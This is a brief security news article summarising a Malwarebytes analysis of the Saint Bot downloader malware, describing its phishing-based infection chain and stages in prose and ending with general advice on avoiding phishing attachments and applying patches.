According to Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes, Saint Bot is a downloader which first appeared in January 2021, and is slowly gaining momentum. The malware dropper has been found dropping stealers such as Taurus Stealer or other loaders, which it deploys for distributing other kind of malware.
It employs a variety of techniques to evade detection, which although nothing novel, but does indicate some level of sophistication on the part of the malware authors considering it's a new malware.
How Saint Bot Malware steals credentials and deploy malicious Payloads?
The Saint Bot Malware infection chain analyzed by Malwarebytes begins with a phishing email that contains an embedded ZIP file ("bitcoin.zip") which claims to be a bitcoin wallet, but in fact, it is a PowerShell script with .LNK shortcut file extension.
The PowerShell script downloads the next stage malware, which is a WindowsUpdate.exe executable, and in turn, drops a second executable (InstallUtil.exe) to take care of downloading more executables namely: def.exe and putty.exe. With the former as a batch script for disabling Windows Defender, while putty.exe contains malicious payload that connects to a command-and-control (C2) server for more exploitation.
The malware's obfuscation techniques in each stage of the infection, allows the operators to exploit the infected system without attracting any attention, coupled with the anti-analysis techniques employed by the malware.
How to mitigate against such Phishing attacks
Saint Bot is yet another tiny downloader, and it is suspected to be sold as a commodity in one of the darknet forums, as it isn't linked with any specific actor.
Just like other similar malware, it pretty much has the same functionalities, though the targets may change or some features could be added, but it's primarily based on keylogging, and extracting personal data from victims. Therefore, it is recommended that online users should ensure they aptly cross-check received emails for any suspicious attachments and patches for known vulnerabilities should be applied when available, especially against weaponized exploits that target Internet tools, such as mail clients and browsers.